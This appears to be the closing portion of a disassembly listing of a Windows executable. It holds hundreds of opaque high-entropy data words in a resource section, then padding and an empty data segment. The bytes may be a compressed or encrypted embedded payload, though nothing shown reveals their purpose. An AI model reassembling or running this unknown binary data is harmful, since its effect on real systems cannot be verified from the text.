dd 0DCE7E6E5h, 0D41D3DFFh, 0B988F2E4h, 53281A05h, 0D2130ACAh
dd 81464394h, 595EBD5Ch, 4E837771h, 0F6AC1814h, 0D261B484h
dd 0DBF807Ch, 585DD401h, 6151F7E1h, 712D0C04h, 4C3CE74Dh
dd 3911BCEDh, 842C3D23h, 1710751Fh, 0D9718EF8h, 0FECC1246h
dd 0DA8AF23Bh, 0B438D785h, 0DE3B2196h, 9BD935D6h, 34C93B17h
dd 0F9B7BE1h, 0EAAE351Dh, 793E50E8h, 0A196A754h, 9742494Ch
dd 8FADA5BBh, 9EEEE28Ch, 9CDDADB1h, 6DA1F4BBh, 10D39F97h
dd 569C3B2Bh, 22617F6Ch, 3D514615h, 1526E71h, 0A36B1317h
dd 0E81C3455h, 0CA13FFE3h, 0BFFF86C9h, 9A82D0D9h, 96FBF9B5h
dd 36F9DCD0h, 58966D73h, 63382672h, 3D495759h, 400A3D20h
dd 0F13A137Fh, 0BD58121Ah, 0D20EE1EFh, 0FDA9D7C1h, 0CB968299h
dd 9AB3B5BBh, 1FE68F84h, 0A3118A0Ah, 0F36039Bh, 0D5539F2Dh
dd 0C3C642ADh, 0BBCA542Eh, 0F5103F06h, 39BA7FFCh, 0D21D295Eh
dd 50A78987h, 0F25753F2h, 0E0A04917h, 50C4C27Ch, 3D459FE4h
dd 8CC6F40Fh, 25727F9Eh, 6932001Ch, 70A05B20h, 0AF7585AAh
dd 0C68CC6F5h, 2C4BEEB4h, 80453336h, 105C68C2h, 0AFE7C9C9h
dd 0F7D51124h, 7C29AA68h, 0E188CDC0h, 7C3DD88Dh, 0B3EFD9E6h
dd 588D83B2h, 0D03593Dh, 6412BA5Bh, 0F086E638h, 34125422h
dd 7FDF593Ch, 4EC60A7Eh, 6B3D2155h, 16740693h, 0D116DBCh
dd 0E55654BAh, 2C509C96h
dd 0ED015094h, 0D59B9D9Ch, 0A9EA81FEh, 3EFBAFDAh, 1A8DB2A2h
dd 0CFD3237Ch, 7A0DE0E1h, 5E69627Dh, 25065F38h, 0F852342Bh
dd 0F0284671h, 3F8F92C1h, 2E6857E9h, 0D8FD4541h, 0CC2ED7E6h
dd 0E9227104h, 11F08EFBh, 44554Dh, 0A406B73Eh, 2605B5B7h
dd 8701341Ch, 609864F2h, 0F52AB272h, 499B9497h, 1B5443AAh
dd 0AF9184EFh, 145DE4A6h, 1B0FFDFEh, 0C229F1CDh, 0D211CFD2h
dd 92CABABDh, 92A48C68h, 73637572h, 4D8572D0h, 0C991A348h
dd 0D29E7B7h, 0F78FF8F7h, 0ED7DA0Ch, 17139AFCh, 0C20A098h
dd 0DA7E2C1Ah, 398CC363h, 80486A68h, 36B77B1Ah, 46897778h
dd 0C68D9E8Eh, 909A37D2h, 0FC3EC291h, 80D2E4E3h, 0FCEBC6A7h
dd 68C49076h, 0B7932763h, 912D3F3Dh, 5D444017h, 11546D6Bh
dd 0AB728469h, 0C0D5D86Fh, 0D94136BFh, 8E36C9C7h, 27EEC0FEh
dd 0CA60F9D5h, 0DCFB0D0Ch, 0B4EDD985h, 62E0B936h, 3BCB5250h
dd 801DE26Fh, 0A31D4155h, 0BB6E57A6h, 9F1566AFh, 0C7364CD3h
dd 0EBCAECEAh, 0E51F0FA7h, 30F7A6E0h, 6093AB1Eh, 5D250705h
dd 450C65D1h, 703D8D63h, 27658385h, 0BA81931Eh, 0E1BB1F23h
dd 0B624C18Fh, 1718DBEAh, 0E92212BAh, 66757B76h, 430B7D3Eh
dd 0CDCBFD1h, 0FC2D314Bh, 0B84062EAh, 8F1D7A76h, 0B6786334h
dd 6866F0A4h, 0E64FBF0Ah, 0A59C7121h, 80EBE3BBh, 2873848Dh
dd 0B66E1A16h, 0A9E0AABDh, 88E6A0BBh, 0F17A0A4h, 0D1677A38h
dd 0B43A0099h, 40BAE78Bh, 0E0A9E430h, 0D78615CEh, 2EF7C9C5h
dd 0AEC5B475h, 0B98F0659h, 532B1D0Dh, 193A0E78h, 8903D25Bh
dd 1B70306Eh, 2477D1E5h, 0F6BE8F18h, 0D5E7B6B4h, 0C7EC8DCAh
dd 29588130h, 7AEB749Dh, 907AF93h, 5F172917h, 98D2D4BAh
dd 5DF0A8AAh, 6A5C5E5Ch, 9C5FE816h, 0DC3F639Ah, 25A18381h
dd 0C193075Dh, 3426CDFh, 92E5C7C6h, 5CC1D98h, 26417423h
dd 649FC33Ah, 85416361h, 0A1740FFDh, 0AFDA7E7Fh, 4086A8A6h
dd 0E6B66238h, 12014BC4h, 0FBCBEDF5h, 2BD1F047h, 0A4075C09h
dd 483F0D42h, 6F219DB5h, 0B53D4F7Dh, 8D54668Ch, 0A501207Bh
dd 916F7913h, 22C1AB99h, 913503CFh, 85C7E9C2h, 0DF5E2C2Eh
dd 0ECFBF6FAh, 741E659Eh, 4B1FF732h, 7396149h, 0F5D1047Ch
dd 0D10B7553h, 5F1E83FBh, 316A5861h, 0BE44BBC9h, 143C2A2Eh
dd 0EC251338h, 40E2D60h, 523C4C6Fh, 571F1496h, 0CBDE2845h
dd 0F0B2A0A3h, 0B820FD4Ah, 4CCE00BAh, 4192948Fh, 60CFB3E8h
dd 8BC2D4F5h, 0FBFBFC3h, 0ADED00FDh, 6F047CD0h, 0FD8ED27Bh
dd 0E832746Eh, 0BCC8539Dh, 0C55F4D2Ch, 76F48AF2h, 3A86489Ah
dd 0A14D484Ah, 94433133h, 0CA75D20h, 9202FBFAh, 3A003DA9h
dd 5107C128h, 48EC403Fh, 7F75EF56h, 95B46E6Dh, 6F738584h
dd 90079CBFh, 0F56CBF96h, 8EB8324Ah, 92781F9h, 0ABE5F7F7h
dd 6BCC2A5Ah, 0A0923FAFh, 641A178Ch, 84AF54BAh, 969A0B96h
dd 150Dh dup(0)
_rsrc ends
; Section 4. (virtual address 00012000)
; Virtual size : 00001000 ( 4096.)
; Section size in file : 00000200 ( 512.)
; Offset to raw data for section: 00012000
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_idata2 segment para public 'DATA' use32
assume cs:_idata2
;org 1012000h
dd 80h dup(0)
align 1000h
_idata2 ends
end start